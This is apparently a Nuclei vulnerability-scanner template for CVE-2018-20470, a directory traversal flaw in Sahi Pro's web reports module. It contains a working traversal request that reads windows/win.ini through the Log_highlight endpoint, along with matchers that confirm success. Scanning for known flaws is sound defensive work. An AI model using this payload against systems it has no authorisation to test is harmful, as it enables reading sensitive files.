35 lines
1.0 KiB
YAML
35 lines
1.0 KiB
YAML
id: CVE-2018-20470
|
|
|
|
info:
|
|
name: Sahi pro 7.x/8.x - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
|
|
reference:
|
|
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
|
|
- https://www.cvedetails.com/cve/CVE-2018-20470
|
|
tags: cve,cve2018,lfi
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2018-20470
|
|
cwe-id: CWE-22
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
part: body
|